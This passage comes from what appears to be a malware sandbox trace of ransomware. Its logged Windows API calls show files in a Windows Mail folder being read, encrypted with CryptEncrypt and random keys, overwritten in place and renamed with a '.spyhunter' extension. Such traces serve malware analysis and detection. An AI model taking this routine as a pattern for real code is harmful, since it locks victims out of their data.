lpNumberOfBytesWritten=0x248f374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f374*=0x104, lpOverlapped=0x0) returned 1 [0141.583] GetProcessHeap () returned 0x2c0000 [0141.583] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.583] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.583] WriteFile (in: hFile=0x158, lpBuffer=0x248f3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f374, lpOverlapped=0x0 | out: lpBuffer=0x248f3b4*, lpNumberOfBytesWritten=0x248f374*=0x4, lpOverlapped=0x0) returned 1 [0141.583] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f374, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f374*=0x30, lpOverlapped=0x0) returned 1 [0141.584] CloseHandle (hObject=0x158) returned 1 [0141.584] GetProcessHeap () returned 0x2c0000 [0141.584] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0141.584] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.spyhunter") returned 77 [0141.584] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\oeold.xml.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\oeold.xml.spyhunter")) returned 1 [0141.584] GetProcessHeap () returned 0x2c0000 [0141.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0141.584] GetProcessHeap () returned 0x2c0000 [0141.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.584] GetProcessHeap () returned 0x2c0000 [0141.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef78a8 | out: hHeap=0x2c0000) returned 1 [0141.585] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3b8 | out: pbBuffer=0x248f3b8) returned 1 [0141.585] GetProcessHeap () returned 0x2c0000 [0141.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.585] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3b0*=0x30) returned 1 [0141.585] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.585] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 73 [0141.585] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".txt") returned 0x0 [0141.585] GetProcessHeap () returned 0x2c0000 [0141.585] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.585] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f374*=0x2800, lpOverlapped=0x0) returned 1 [0141.586] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.586] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f374, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f374*=0x2800, lpOverlapped=0x0) returned 1 [0141.587] GetProcessHeap () returned 0x2c0000 [0141.587] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.587] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.587] WriteFile (in: hFile=0x158, lpBuffer=0x248f3b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f374, lpOverlapped=0x0 | out: lpBuffer=0x248f3b4*, lpNumberOfBytesWritten=0x248f374*=0x4, lpOverlapped=0x0) returned 1 [0141.588] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f374, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f374*=0x30, lpOverlapped=0x0) returned 1 [0141.588] CloseHandle (hObject=0x158) returned 1 [0141.588] GetProcessHeap () returned 0x2c0000 [0141.588] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0141.588] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.spyhunter") returned 83 [0141.588] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.spyhunter")) returned 1 [0141.589] GetProcessHeap () returned 0x2c0000 [0141.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0141.589] GetProcessHeap () returned 0x2c0000 [0141.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.589] GetProcessHeap () returned 0x2c0000 [0141.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7908 | out: hHeap=0x2c0000) returned 1 [0141.589] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3b0 | out: pbBuffer=0x248f3b0) returned 1 [0141.589] GetProcessHeap () returned 0x2c0000 [0141.589] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.589] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3a8*=0x30) returned 1 [0141.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.590] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs") returned 73 [0141.590] StrStrW (lpFirst="edbres00001.jrs", lpSrch=".txt") returned 0x0 [0141.590] GetProcessHeap () returned 0x2c0000 [0141.590] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.590] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f36c*=0x2800, lpOverlapped=0x0) returned 1 [0141.591] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.591] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f36c*=0x2800, lpOverlapped=0x0) returned 1 [0141.591] GetProcessHeap () returned 0x2c0000 [0141.591] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.591] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.591] WriteFile (in: hFile=0x158, lpBuffer=0x248f3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f36c, lpOverlapped=0x0 | out: lpBuffer=0x248f3ac*, lpNumberOfBytesWritten=0x248f36c*=0x4, lpOverlapped=0x0) returned 1 [0141.593] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f36c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f36c*=0x30, lpOverlapped=0x0) returned 1 [0141.593] CloseHandle (hObject=0x158) returned 1 [0141.593] GetProcessHeap () returned 0x2c0000 [0141.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0141.593] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.spyhunter") returned 83 [0141.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00001.jrs.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edbres00001.jrs.spyhunter")) returned 1 [0141.594] GetProcessHeap () returned 0x2c0000 [0141.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0141.594] GetProcessHeap () returned 0x2c0000 [0141.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.594] GetProcessHeap () returned 0x2c0000 [0141.594] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff7828 | out: hHeap=0x2c0000) returned 1 [0141.594] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3b0 | out: pbBuffer=0x248f3b0) returned 1 [0141.594] GetProcessHeap () returned 0x2c0000 [0141.594] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.594] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3a8*=0x30) returned 1 [0141.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.595] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 70 [0141.595] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0141.595] GetProcessHeap () returned 0x2c0000 [0141.595] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.595] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f36c*=0x2800, lpOverlapped=0x0) returned 1 [0141.596] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.596] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f36c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f36c*=0x2800, lpOverlapped=0x0) returned 1 [0141.596] GetProcessHeap () returned 0x2c0000 [0141.596] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.597] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.597] WriteFile (in: hFile=0x158, lpBuffer=0x248f3ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f36c, lpOverlapped=0x0 | out: lpBuffer=0x248f3ac*, lpNumberOfBytesWritten=0x248f36c*=0x4, lpOverlapped=0x0) returned 1 [0141.598] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f36c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f36c*=0x30, lpOverlapped=0x0) returned 1 [0141.598] CloseHandle (hObject=0x158) returned 1 [0141.598] GetProcessHeap () returned 0x2c0000 [0141.598] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0141.598] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.spyhunter") returned 80 [0141.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb00001.log.spyhunter")) returned 1 [0141.599] GetProcessHeap () returned 0x2c0000 [0141.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0141.599] GetProcessHeap () returned 0x2c0000 [0141.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.599] GetProcessHeap () returned 0x2c0000 [0141.599] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fef4d8 | out: hHeap=0x2c0000) returned 1 [0141.599] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3a8 | out: pbBuffer=0x248f3a8) returned 1 [0141.599] GetProcessHeap () returned 0x2c0000 [0141.600] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.600] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3a0*=0x30) returned 1 [0141.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.601] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 65 [0141.601] StrStrW (lpFirst="edb.log", lpSrch=".txt") returned 0x0 [0141.601] GetProcessHeap () returned 0x2c0000 [0141.601] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.601] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f364*=0x2800, lpOverlapped=0x0) returned 1 [0141.617] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.617] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f364*=0x2800, lpOverlapped=0x0) returned 1 [0141.620] GetProcessHeap () returned 0x2c0000 [0141.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.620] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.620] WriteFile (in: hFile=0x158, lpBuffer=0x248f3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f364, lpOverlapped=0x0 | out: lpBuffer=0x248f3a4*, lpNumberOfBytesWritten=0x248f364*=0x4, lpOverlapped=0x0) returned 1 [0141.621] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f364, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f364*=0x30, lpOverlapped=0x0) returned 1 [0141.621] CloseHandle (hObject=0x158) returned 1 [0141.621] GetProcessHeap () returned 0x2c0000 [0141.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0141.622] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.spyhunter") returned 75 [0141.622] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.log.spyhunter")) returned 1 [0141.622] GetProcessHeap () returned 0x2c0000 [0141.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0141.622] GetProcessHeap () returned 0x2c0000 [0141.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.622] GetProcessHeap () returned 0x2c0000 [0141.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef77d8 | out: hHeap=0x2c0000) returned 1 [0141.623] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f3a8 | out: pbBuffer=0x248f3a8) returned 1 [0141.623] GetProcessHeap () returned 0x2c0000 [0141.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.623] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f3a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f3a0*=0x30) returned 1 [0141.623] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.623] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 65 [0141.623] StrStrW (lpFirst="edb.chk", lpSrch=".txt") returned 0x0 [0141.623] GetProcessHeap () returned 0x2c0000 [0141.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.625] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f364*=0x2000, lpOverlapped=0x0) returned 1 [0141.866] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.866] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x248f364, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f364*=0x2000, lpOverlapped=0x0) returned 1 [0141.866] GetProcessHeap () returned 0x2c0000 [0141.866] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.866] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.866] WriteFile (in: hFile=0x158, lpBuffer=0x248f3a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f364, lpOverlapped=0x0 | out: lpBuffer=0x248f3a4*, lpNumberOfBytesWritten=0x248f364*=0x4, lpOverlapped=0x0) returned 1 [0141.866] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f364, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f364*=0x30, lpOverlapped=0x0) returned 1 [0141.866] CloseHandle (hObject=0x158) returned 1 [0141.866] GetProcessHeap () returned 0x2c0000 [0141.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0141.866] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.spyhunter") returned 75 [0141.866] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\edb.chk.spyhunter")) returned 1 [0141.867] GetProcessHeap () returned 0x2c0000 [0141.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0141.867] GetProcessHeap () returned 0x2c0000 [0141.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0141.867] GetProcessHeap () returned 0x2c0000 [0141.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef7708 | out: hHeap=0x2c0000) returned 1 [0141.871] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f398 | out: pbBuffer=0x248f398) returned 1 [0141.871] GetProcessHeap () returned 0x2c0000 [0141.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0141.871] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f390*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f390*=0x30) returned 1 [0141.871] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0141.871] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat") returned 84 [0141.871] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0141.871] GetProcessHeap () returned 0x2c0000 [0141.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0141.872] ReadFile (in: hFile=0x158, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f354*=0x2800, lpOverlapped=0x0) returned 1 [0141.986] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.986] WriteFile (in: hFile=0x158, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f354*=0x2800, lpOverlapped=0x0) returned 1 [0141.986] GetProcessHeap () returned 0x2c0000 [0141.986] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0141.986] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.986] WriteFile (in: hFile=0x158, lpBuffer=0x248f394*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x248f394*, lpNumberOfBytesWritten=0x248f354*=0x4, lpOverlapped=0x0) returned 1 [0141.987] WriteFile (in: hFile=0x158, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f354, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x248f354*=0x30, lpOverlapped=0x0) returned 1 [0141.987] CloseHandle (hObject=0x158) returned 1 [0141.987] GetProcessHeap () returned 0x2c0000 [0141.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0141.987] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.spyhunter") returned 94 [0141.987] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.pat.spyhunter" (normalized: 